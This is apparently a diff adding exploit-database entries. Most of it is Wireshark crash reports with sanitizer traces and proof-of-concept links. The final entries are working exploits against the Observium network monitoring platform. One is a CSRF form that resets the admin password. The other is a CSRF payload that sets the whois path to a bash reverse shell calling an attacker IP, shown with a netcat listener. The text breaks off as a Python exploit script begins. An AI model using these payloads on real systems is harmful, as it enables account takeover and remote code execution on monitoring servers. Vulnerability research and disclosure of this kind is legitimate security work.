+    [208, 212) 'length130'
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-dof.c:2662:32 in dissect_2008_16_security_4
+Shadow bytes around the buggy address:
+  0x10006dd352f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35330: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f2 04 f2
+=>0x10006dd35340: 02 f2 04 f2 00 00 00 00 f2 f2 f2 f2 00[f2]f2 f2
+  0x10006dd35350: 02 f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10006dd35390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==27389==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12351. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39748.zip
+
--- a/platforms/multiple/dos/39749.txt
+++ b/platforms/multiple/dos/39749.txt
@ -0,0 +1,110 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=804
+
+The following crash due to an asserion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+ERROR:./address.h:144:alloc_address_wmem: assertion failed: (addr_data == NULL)
+
+Program received signal SIGABRT, Aborted.
+0x00007fffe13f5cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
+(gdb) where
+#0  0x00007fffe13f5cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+#1  0x00007fffe13f90d8 in __GI_abort () at abort.c:89
+#2  0x00007fffe2e8c165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#3  0x00007fffe2e8c1fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#4  0x00007fffeabea578 in alloc_address_wmem (scope=0x60700000c110, addr=0x7ffe9039af00, addr_type=22, 
+    addr_len=0, addr_data=0x7ffe9039acb0) at ./address.h:144
+#5  0x00007fffeabe3454 in copy_address_wmem (scope=0x60700000c110, to=0x7ffe9039af00, from=0x7ffe9039a920)
+    at ./address.h:254
+#6  0x00007fffeabe2ec7 in conversation_new (setup_frame=10, addr1=0x7ffe9039a8e8, addr2=0x7ffe9039a920, 
+    ptype=PT_NONE, port1=0, port2=0, options=2) at conversation.c:701
+#7  0x00007fffebfe61a8 in get_peer_conversation (pinfo=0x61400000f058, tpt_conv_data=0x7ffe9039a8c0, create=1)
+    at packet-jxta.c:800
+#8  0x00007fffebfda23d in dissect_jxta_stream (tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, 
+    data=0x7fffffff5f30) at packet-jxta.c:682
+#9  0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:656
+#10 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, 
+    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffff5f30) at packet.c:731
+#11 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, pinfo=0x61400000f058, 
+    tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:2764
+#12 0x00007fffeabe9336 in try_conversation_dissector (addr_a=0x61400000f118, addr_b=0x61400000f130, 
+    ptype=PT_TCP, port_a=32925, port_b=9711, tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, 
+    data=0x7fffffff5f30) at conversation.c:1323
+#13 0x00007fffecd90b6b in decode_tcp_ports (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, 
+    tree=0x6190001500a0, src_port=32925, dst_port=9711, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30)
+    at packet-tcp.c:4981
+#14 0x00007fffecd96f1b in process_tcp_payload (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, 
+    tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, src_port=32925, dst_port=9711, seq=145, nxtseq=3338, 
+    is_tcp_segment=1, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30) at packet-tcp.c:5085
+#15 0x00007fffecd91fcc in dissect_tcp_payload (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, offset=32, seq=145, 
+    nxtseq=3338, sport=32925, dport=9711, tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, tcpd=0x7ffe9039a3c0, 
+    tcpinfo=0x7fffffff5f30) at packet-tcp.c:5166
+#16 0x00007fffecda8229 in dissect_tcp (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, tree=0x6190001500a0, 
+    data=0x7ffe8ff93880) at packet-tcp.c:6071
+#17 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7ffe8ff93880) at packet.c:656
+#18 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, 
+    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:731
+#19 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000093c40, uint_val=6, tvb=0x61d0001a6ed0, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:1190
+#20 0x00007fffebe8733c in ip_try_dissect (heur_first=0, tvb=0x61d0001a6ed0, pinfo=0x61400000f058, 
+    tree=0x6190001500a0, iph=0x7ffe8ff93880) at packet-ip.c:1977
+#21 0x00007fffebe9214a in dissect_ip_v4 (tvb=0x61d0001a6140, pinfo=0x61400000f058, parent_tree=0x6190001500a0, 
+    data=0x0) at packet-ip.c:2476
+#22 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x0) at packet.c:656
+#23 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, 
+    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:731
+#24 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000052380, uint_val=2048, 
+    tvb=0x61d0001a6140, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:1190
+#25 0x00007fffeac548f5 in dissector_try_uint (sub_dissectors=0x61d000052380, uint_val=2048, tvb=0x61d0001a6140, 
+    pinfo=0x61400000f058, tree=0x6190001500a0) at packet.c:1216
+#26 0x00007fffeb97476a in dissect_ethertype (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, 
+    data=0x7fffffffa080) at packet-ethertype.c:257
+#27 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:656
+#28 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, 
+    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffa080) at packet.c:731
+#29 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, pinfo=0x61400000f058, 
+    tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2764
+#30 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2777
+#31 0x00007fffecb24cac in dissect_sll (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, 
+---Type <return> to continue, or q <return> to quit---
+    data=0x61300000df08) at packet-sll.c:291
+#32 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x61300000df08) at packet.c:656
+#33 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, 
+    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08) at packet.c:731
+#34 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000051a40, uint_val=25, 
+    tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08)
+    at packet.c:1190
+#35 0x00007fffeba65106 in dissect_frame (tvb=0x61d0001a74c0, pinfo=0x61400000f058, parent_tree=0x6190001500a0, 
+    data=0x7fffffffc560) at packet-frame.c:492
+#36 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:656
+#37 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, 
+    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffc560) at packet.c:731
+#38 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, pinfo=0x61400000f058, 
+    tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2764
+#39 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, 
+    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2777
+#40 0x00007fffeac4ecd5 in dissect_record (edt=0x61400000f040, file_type_subtype=1, phdr=0x61300000dea0, 
+    tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at packet.c:539
+#41 0x00007fffeac01dba in epan_dissect_run_with_taps (edt=0x61400000f040, file_type_subtype=1, 
+    phdr=0x61300000dea0, tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at epan.c:376
+#42 0x000000000052ef40 in process_packet (cf=0x14b82e0 <cfile>, edt=0x61400000f040, offset=2804, 
+    whdr=0x61300000dea0, pd=0x6210000fb500 "\300", tap_flags=0) at tshark.c:3727
+#43 0x000000000052830d in load_cap_file (cf=0x14b82e0 <cfile>, save_file=0x0, out_file_type=2, 
+    out_file_name_res=0, max_packet_count=-9, max_byte_count=0) at tshark.c:3483
+#44 0x000000000051e67d in main (argc=3, argv=0x7fffffffe268) at tshark.c:2192
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12354. Attached are two files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39749.zip
+
--- a/platforms/multiple/dos/39750.txt
+++ b/platforms/multiple/dos/39750.txt
@ -0,0 +1,176 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=806
+
+The following crashes due to a static out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==666==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fa5e68bd620 at pc 0x7fa5dc525eab bp 0x7ffd5938ec40 sp 0x7ffd5938ec38
+READ of size 4 at 0x7fa5e68bd620 thread T0
+    #0 0x7fa5dc525eaa in dissect_zcl_pwr_prof_pwrprofnotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25
+    #1 0x7fa5dc512afc in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10549:21
+    #2 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #3 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
+    #4 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #5 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #6 0x7fa5dc4f777c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
+    #7 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #8 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
+    #9 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #10 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #11 0x7fa5dc4d0d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
+    #12 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #13 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
+    #14 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #15 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #16 0x7fa5dc4d04fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
+    #17 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #18 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
+    #19 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #20 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #21 0x7fa5dc4da910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
+    #22 0x7fa5dc4d419a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
+    #23 0x7fa5dc4d5fb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
+    #24 0x7fa5d9d83bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
+    #25 0x7fa5daf6591b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
+    #26 0x7fa5daf5756a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
+    #27 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #28 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
+    #29 0x7fa5d9d7ad4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #30 0x7fa5dab8c105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
+    #31 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #32 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
+    #33 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #34 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #35 0x7fa5d9d75cd4 in dissect_record wireshark/epan/packet.c:539:3
+    #36 0x7fa5d9d28db9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
+    #37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
+    #38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
+    #39 0x51e67c in main wireshark/tshark.c:2192:13
+
+0x7fa5e68bd620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7fa5e68bd640) of size 128
+0x7fa5e68bd620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7fa5e68bd5e0) of size 64
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25 in dissect_zcl_pwr_prof_pwrprofnotif
+Shadow bytes around the buggy address:
+  0x0ff53cd0fa70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
+  0x0ff53cd0fa80: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+  0x0ff53cd0fa90: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff53cd0faa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
+  0x0ff53cd0fab0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
+=>0x0ff53cd0fac0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
+  0x0ff53cd0fad0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
+  0x0ff53cd0fae0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff53cd0faf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff53cd0fb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ff53cd0fb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==666==ABORTING
+--- cut ---
+
+--- cut ---
+==695==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7feb11013620 at pc 0x7feb06c7b825 bp 0x7ffd6fe96b00 sp 0x7ffd6fe96af8
+READ of size 4 at 0x7feb11013620 thread T0
+    #0 0x7feb06c7b824 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25
+    #1 0x7feb06c68ba8 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10563:21
+    #2 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #3 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
+    #4 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #5 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #6 0x7feb06c4d77c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
+    #7 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #8 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
+    #9 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #10 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #11 0x7feb06c26d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
+    #12 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #13 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
+    #14 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #15 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #16 0x7feb06c264fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
+    #17 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #18 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
+    #19 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #20 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #21 0x7feb06c30910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
+    #22 0x7feb06c2a19a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
+    #23 0x7feb06c2bfb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
+    #24 0x7feb044d9bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
+    #25 0x7feb056bb91b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
+    #26 0x7feb056ad56a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
+    #27 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #28 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
+    #29 0x7feb044d0d4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
+    #30 0x7feb052e2105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
+    #31 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
+    #32 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
+    #33 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
+    #34 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
+    #35 0x7feb044cbcd4 in dissect_record wireshark/epan/packet.c:539:3
+    #36 0x7feb0447edb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
+    #37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
+    #38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
+    #39 0x51e67c in main wireshark/tshark.c:2192:13
+
+0x7feb11013620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7feb11013640) of size 128
+0x7feb11013620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7feb110135e0) of size 64
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25 in dissect_zcl_pwr_prof_enphsschednotif
+Shadow bytes around the buggy address:
+  0x0ffde21fa670: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
+  0x0ffde21fa680: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+  0x0ffde21fa690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffde21fa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
+  0x0ffde21fa6b0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
+=>0x0ffde21fa6c0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
+  0x0ffde21fa6d0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
+  0x0ffde21fa6e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffde21fa6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffde21fa700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0ffde21fa710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==695==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12358. Attached are two files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39750.zip
+
--- a/platforms/php/webapps/39744.html
+++ b/platforms/php/webapps/39744.html
@ -0,0 +1,36 @@
+<!--
+# Exploit title: Observium Commercial - CSRF
+# Author: Dolev Farhi
+# Contact: dolevf at protonmail.com
+# Date: 28-04-2016
+# Vendor homepage: http://observium.org/
+# Software version: CE 0.16.7533
+
+ 
+# Details:
+Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more. Observium focuses on providing a beautiful and powerful yet simple and intuitive interface to the health and status of your network.
+
+CSRF details
+due to lack of csrf protection, it is possible to create an additional administrator user, or change the current administrator password since it does not ask for the previous password before changing it. 
+i.e. New password <Enter new pass> & retype password <Enter new pass>
+instead of having to insert the older password.
+such an attack would look like this:
+-->
+
+<html>
+<div align="center">
+<pre>
+ 
+<h2><b>Change admin password<b></h2>
+<body>
+<form
+action="http://observiumIP/edituser/user_id=1/"
+method="POST">
+<input type="hidden" name="action" value="changepass" />
+<input type="hidden" name="new_pass" value="test123" />
+<input type="hidden" name="new_pass2" value="test123" />
+<input type="submit" name="submit" value="save" />
+    </form>
+    </body>
+</div>
+</html>
--- a/platforms/php/webapps/39745.txt
+++ b/platforms/php/webapps/39745.txt
@ -0,0 +1,108 @@
+# Exploit title: Observium Commercial - Authenticated RCE
+# Author: Dolev Farhi
+# Contact: dolevf at protonmail.com
+# Date: 28-04-2016
+# Vendor homepage: http://observium.org/
+# Software version: CE 0.16.7533
+
+Authenticated remote code execution
+Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8
+using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener
+
+root@pt:~# nc -lvp 4444
+listening on [any] 4444 ...
+
+and a CSRF which looks like this:
+
+<!-- 
+<html>
+<div align="center">
+<pre>
+ 
+<h2><b>CSRF<b></h2>
+<body>
+<form
+action="http://<observiumIP>/settings/section=paths/"
+method="POST">
+<input type="hidden" name="temp_dir" value="" />
+<input type="hidden" name="varset_temp_dir" value="" />
+<input type="hidden" name="varset_rrdtool" value="" />
+<input type="hidden" name="fping" value="" />
+<input type="hidden" name="varset_fping" value="" />
+<input type="hidden" name="fping6" value="" />
+<input type="hidden" name="varset_fping6" value="" />
+<input type="hidden" name="svn" value="" />
+<input type="hidden" name="varset_svn" value="" />
+<input type="hidden" name="snmpget" value="" />
+<input type="hidden" name="varset_snmpget" value="" />
+<input type="hidden" name="snmpwalk" value="" />
+<input type="hidden" name="varset_snmpwalk" value="" />
+<input type="hidden" name="snmpbulkget" value="" />
+<input type="hidden" name="varset_snmpbulkget" value="" />
+<input type="hidden" name="snmpbulkwalk" value="" />
+<input type="hidden" name="varset_snmpbulkwalk" value="" />
+<input type="hidden" name="snmptranslate" value="" />
+<input type="hidden" name="varset_snmptranslate" value="" />
+<input type="hidden" name="ipmitool" value="" />
+<input type="hidden" name="varset_ipmitool" value="" />
+<input type="hidden" name="virsh" value="" />
+<input type="hidden" name="varset_virsh" value="" />
+<input type="hidden" name="wmic" value="" />
+<input type="hidden" name="varset_wmic" value="" />
+<input type="hidden" name="git" value="" />
+<input type="hidden" name="varset_git" value="" />
+<input type="hidden" name="whois" value="bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit" />
+<input type="hidden" name="varset_whois" value="" />
+<input type="hidden" name="whois_custom" value="1" />
+<input type="hidden" name="file" value="" />
+<input type="hidden" name="varset_file" value="" />
+<input type="hidden" name="dot" value="" />
+<input type="hidden" name="varset_dot" value="" />
+<input type="submit" name="submit" value="save" />
+    </form>
+    </body>
+</div>
+</html>
+
+or by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit'  and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the 
+whois parameter which gives us a reverse shell on the machine:
+
+you may also use the following python instead:
+
+"""
+import sys
+import urllib
+import urllib2
+import cookielib
+
+#!/usr/bin/python 
+username = 'test'
